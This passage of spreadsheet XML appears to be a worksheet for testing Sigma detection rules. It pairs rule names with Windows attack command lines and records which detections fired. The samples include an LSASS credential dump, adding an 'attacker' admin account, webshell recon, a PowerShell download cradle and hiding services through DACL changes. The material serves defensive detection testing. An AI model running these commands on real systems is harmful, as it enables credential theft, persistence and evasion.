        </is>
      </c>
      <c r="D769" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E769" s="44" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share -USER:domain\user password</t>
        </is>
      </c>
      <c r="F769" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G769" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I769" s="44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769" s="44" t="n"/>
      <c r="K769" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="770" ht="15.75" customHeight="1" s="42">
      <c r="A770" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B770" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C770" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D770" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E770" s="44" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:domain\user password</t>
        </is>
      </c>
      <c r="F770" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I770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770" s="44" t="n"/>
      <c r="K770" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="771" ht="15.75" customHeight="1" s="42">
      <c r="A771" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B771" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C771" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D771" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E771" s="44" t="inlineStr">
        <is>
          <t>net use "\192.0.2.10\share" /USER:domain\user password</t>
        </is>
      </c>
      <c r="F771" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I771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771" s="44" t="n"/>
      <c r="K771" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="772" ht="15.75" customHeight="1" s="42">
      <c r="A772" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B772" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C772" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D772" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E772" s="44" t="inlineStr">
        <is>
          <t>net	use	\192.0.2.10\share	/USER:domain\user	password</t>
        </is>
      </c>
      <c r="F772" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G772" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I772" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J772" s="44" t="n"/>
      <c r="K772" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="773" ht="15.75" customHeight="1" s="42">
      <c r="A773" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B773" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C773" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D773" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E773" s="44" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:"domain\user" password</t>
        </is>
      </c>
      <c r="F773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I773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773" s="44" t="n"/>
      <c r="K773" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="774" ht="15.75" customHeight="1" s="42">
      <c r="A774" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B774" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C774" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D774" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E774" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [S]"</t>
        </is>
      </c>
      <c r="F774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I774" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J774" s="44" t="n"/>
      <c r="K774" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="775" ht="15.75" customHeight="1" s="42">
      <c r="A775" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B775" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C775" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D775" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E775" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp;&amp; echo [S]"</t>
        </is>
      </c>
      <c r="F775" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G775" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I775" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J775" s="44" t="n"/>
      <c r="K775" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="776" ht="15.75" customHeight="1" s="42">
      <c r="A776" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B776" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C776" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D776" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E776" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "^w^h^o^a^m^i&amp;echo [S]"</t>
        </is>
      </c>
      <c r="F776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I776" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J776" s="44" t="n"/>
      <c r="K776" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="777" ht="15.75" customHeight="1" s="42">
      <c r="A777" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B777" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C777" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D777" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E777" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami | clip &amp; echo [S]"</t>
        </is>
      </c>
      <c r="F777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H777" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I777" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J777" s="44" t="n"/>
      <c r="K777" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="778" ht="15.75" customHeight="1" s="42">
      <c r="A778" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B778" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C778" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D778" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E778" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\System32"comsvcs".dll,MiniDump 624 C:\temp\lsass.dmp full</t>
        </is>
      </c>
      <c r="F778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I778" s="4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J778" s="44" t="n"/>
      <c r="K778" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="779" ht="15.75" customHeight="1" s="42">
      <c r="A779" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B779" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C779" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D779" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E779" s="44" t="inlineStr">
        <is>
          <t>rar.exe a -m5  -hpSecure123 C:\backup.rar C:\data\</t>
        </is>
      </c>
      <c r="F779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I779" s="44" t="n"/>
      <c r="J779" s="44" t="n"/>
      <c r="K779" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="780" ht="15.75" customHeight="1" s="42">
      <c r="A780" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B780" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C780" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D780" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E780" s="44" t="inlineStr">
        <is>
          <t>net.exe user attacker Pass1234 /add</t>
        </is>
      </c>
      <c r="F780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I780" s="44" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J780" s="44" t="n"/>
      <c r="K780" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="781" ht="15.75" customHeight="1" s="42">
      <c r="A781" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B781" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C781" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D781" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E781" s="44" t="inlineStr">
        <is>
          <t>net1 localgroup administrators attacker /add</t>
        </is>
      </c>
      <c r="F781" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G781" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I781" s="44" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group (ad720b90-25ad-43ff-9b5e-5c841facc8e5); User Added to Local Administrators Group (ad720b90-25ad-43ff-9b5e-5c841facc8e5)</t>
        </is>
      </c>
      <c r="J781" s="44" t="n"/>
      <c r="K781" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="782" ht="15.75" customHeight="1" s="42">
      <c r="A782" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B782" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C782" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D782" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E782" s="44" t="inlineStr">
        <is>
          <t>net.exe  user</t>
        </is>
      </c>
      <c r="F782" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G782" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I782" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J782" s="44" t="n"/>
      <c r="K782" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="783" ht="15.75" customHeight="1" s="42">
      <c r="A783" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B783" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C783" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D783" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E783" s="44" t="inlineStr">
        <is>
          <t>net.exe "user"</t>
        </is>
      </c>
      <c r="F783" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G783" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I783" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J783" s="44" t="n"/>
      <c r="K783" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="784" ht="15.75" customHeight="1" s="42">
      <c r="A784" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B784" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C784" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D784" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E784" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /node="127.0.0.1" process list</t>
        </is>
      </c>
      <c r="F784" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G784" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I784" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J784" s="44" t="n"/>
      <c r="K784" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="785" ht="15.75" customHeight="1" s="42">
      <c r="A785" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B785" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C785" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D785" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E785" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -e bmV3LW9iamVjdCAtY29tIG9iamVjdCBzY3JpcHRpbmcuZmlsZXN5c3RlbW9iamVjdA==</t>
        </is>
      </c>
      <c r="F785" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G785" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I785" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J785" s="44" t="n"/>
      <c r="K785" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="786" ht="15.75" customHeight="1" s="42">
      <c r="A786" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B786" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C786" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D786" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E786" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$w = New-Object System.Net.WebClient; $w.((('Down'+'load')+'String')).Invoke('[http://127.0.0.1/s.ps1](https://www.google.com/search?q=http://127.0.0.1/s.ps1)')"</t>
        </is>
      </c>
      <c r="F786" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G786" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I786" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J786" s="44" t="n"/>
      <c r="K786" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="787" ht="15.75" customHeight="1" s="42">
      <c r="A787" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B787" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C787" s="44" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D787" s="44" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E787" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name AtomicService -SecurityDescriptorSddl 'D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'"</t>
        </is>
      </c>
      <c r="F787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I787" s="44" t="n"/>
      <c r="J787" s="44" t="n"/>
      <c r="K787" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="788" ht="15.75" customHeight="1" s="42">
      <c r="A788" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B788" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C788" s="44" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D788" s="44" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E788" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name `"AtomicService`" -SecurityDescriptorSddl `"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)`""</t>
        </is>
      </c>
      <c r="F788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I788" s="44" t="n"/>
      <c r="J788" s="44" t="n"/>
      <c r="K788" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="789" ht="15.75" customHeight="1" s="42">
      <c r="A789" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B789" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C789" s="44" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D789" s="44" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E789" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name AtomicService -sd 'D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'"</t>
        </is>
      </c>
      <c r="F789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I789" s="44" t="n"/>
      <c r="J789" s="44" t="n"/>
      <c r="K789" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="790" ht="15.75" customHeight="1" s="42">
      <c r="A790" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B790" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C790" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D790" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E790" s="44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790" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I790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790" s="44" t="n"/>
      <c r="K790" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="791" ht="15.75" customHeight="1" s="42">
      <c r="A791" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B791" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C791" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D791" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E791" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe sdset AtomicService "D:(D;;DCLCWPDT^SD;;;IU)(D;;DCLCWPDT^SD;;;SU)(D;;DCLCWPDT^SD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F791" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G791" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I791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91" s="44" t="n"/>
      <c r="K791" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="15.75" customHeight="1" s="42">
      <c r="A792" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B792" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C792" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D792" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E792" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset AtomicService "D:(D;;SDDTWPWPLCDC;;;IU)(D;;SDDTWPWPLCDC;;;SU)(D;;SDDTWPWPLCDC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F792" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G792" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I792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792" s="44" t="n"/>
      <c r="K792" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="15.75" customHeight="1" s="42">
      <c r="A793" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B793" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C793" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D793" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E793" s="44" t="inlineStr">
        <is>
          <t>sc.exe "sdset" BenignService "D:(D;;DCLCWPDTSD;;;IU)"</t>
        </is>
      </c>
      <c r="F793" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I793" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE (a537cfc3-4297-4789-92b5-345bfd845ad0); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J793" s="44" t="n"/>
      <c r="K793" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="794" ht="15.75" customHeight="1" s="42">
      <c r="A794" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B794" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C794" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D794" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E794" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe s^dset BenignService "D:(D;;DCLCWPDTSD;;;IU)"</t>
        </is>
      </c>
      <c r="F794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I794" s="44" t="inlineStr">
        <is>
